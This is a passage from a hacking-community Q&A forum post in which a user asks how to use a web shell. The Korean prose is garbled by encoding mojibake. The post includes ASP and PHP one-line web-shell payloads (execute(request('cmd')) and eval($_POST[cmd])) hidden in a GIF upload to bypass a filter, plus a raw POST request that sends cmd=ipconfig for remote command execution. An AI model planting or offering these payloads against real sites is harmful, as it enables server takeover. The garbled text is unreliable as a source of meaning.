214, 9/11 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   stoopynice
   À¥½© °ü·Ã Áú¹®ÀÖ½À´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=209 [º¹»ç]


±× ÆÄÀÏ ¾÷·Îµå ¿ìȸÇؼ­ (gif ÆÄÀÏ¿¡ ¾Æ·¡ Äڵ带 ³Ö¾î¼­)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
ÆäÀÌÁö¿¡ »ðÀÔÇÑ´ÙÀ½¿¡ ipconfig°°Àº ¸í·ÉÀ» ½ÇÇèÇغ¸°í ½ÍÀºµ¥
(À§¿¡ Äڵ尡 cmd ºÒ·¯¿Í¼­ cmd ¸í·ÉÇϴ°ÅÁÒ?)
Çǵ鷯¿¡ composer ÅÇ¿¡ ¾Æ·¡ ³»¿ë º¸³»¸é µÇ³ª¿ä??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;

¿ä·±½ÄÀ¸·Î executeÇؼ­ Å×½ºÆ®ÇϸéµÇ³ª¿ä?

  Hit : 4669     Date : 2015/07/26 12:22



    
54   À¥ÇØÅ· °øºÎ Áú¹®ÀÌ¿ä~[2]     ansqudfyd
05/02 3491
53   ÀÌ °ø°Ý±¸¹®¿¡ ´ëÇÑ ¼³¸í ºÎŹµå¸³´Ï´Ù.[1]     ju3622
05/05 3521
52     [re] ÀÌ °ø°Ý±¸¹®¿¡ ´ëÇÑ ¼³¸í ºÎŹµå¸³´Ï´Ù.     cosine
06/28 2652
51   phpÃ¥ Ãßõ ºÎŹµå¸³´Ï´Ù.[1]     h@cking2013
06/05 3909
50   ¸ÆºÏÀ¸·Î À¥ ¸ðÀÇÇØÅ·     chachaco
06/16 3936
49   KISA ÇØÅ·¹æ¾î ÈÆ·ÃÀå WEB ¹®Á¦¿Í °ü·ÃÇؼ­ Áú¹®µå¸³´Ï´Ù.[1]     jhjang1005
07/16 3468
  À¥½© °ü·Ã Áú¹®ÀÖ½À´Ï´Ù.     stoopynice
07/26 4668
47   sqlmap °ü·Ã¹× µ¥ÀÌÅͺ£À̽º °ü·Ã¿¡ Áú¹®ÇÕ´Ï´Ù[1]     r0ki
10/10 3379
46   URLÀ» È°¿ëÇÑ Json ÆÄÀÏ APIºÐ¼®     huny606
12/24 2875
45   ±Ã±ÝÇؼ­ Áú¹®ÇÕ´Ï´Ù~[2]     ju3622
01/09 2666
44   ÀÇ·ÚÀÔ´Ï´Ù[4]     jjogun
01/30 3005
43   ÇÁ·Ï½Ã ÇÁ·Î±×·¥ÀÌ ¾ÈµË´Ï´Ù[1]     yayaja11
03/05 2842
42   sql injection °ø°Ý ¿À·ù¹ÝȯÁú¹®ÀÌ¿ä.[4]     yayaja11
03/21 2786
41   ¿ÏÀüÃʺ¸¶ó ±Ã±ÝÇϳ׿ä À¥½© XSS µî[1]     sm8303
04/21 3756
40   ÄíÅ°¹®ÀÇ[3]     sm8303
04/21 2812
39   HTTP Çì´õ[1]     chaneyoon
04/30 2796
38   ¹ÙµÏÀÌ ¿Ãºä¾î Á¦ÀÛÀÚ ¸ð½Ê´Ï´Ù     killerkor
05/25 3056
37   Å©·¡Å· ÇØÁֽǺР±¸ÇØ¿ä (ºÒ¹ýx) »ç·Êµå¸³´Ï´Ù.     mss0812
06/22 3197
36   Ä®¸®¸®´ª½º À¥ Ãë¾àÁ¡ Á¡°Ë ½ºÄ³³Ê Áú¹®..     duwkakstp1
08/21 4084
35   °Ô½Ã¹° ºñ¹Ð¹øÈ£ ¿ìȸ     qkrrmsgP
11/08 4135
[1][2][3][4][5][6][7][8] 9 [10]..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org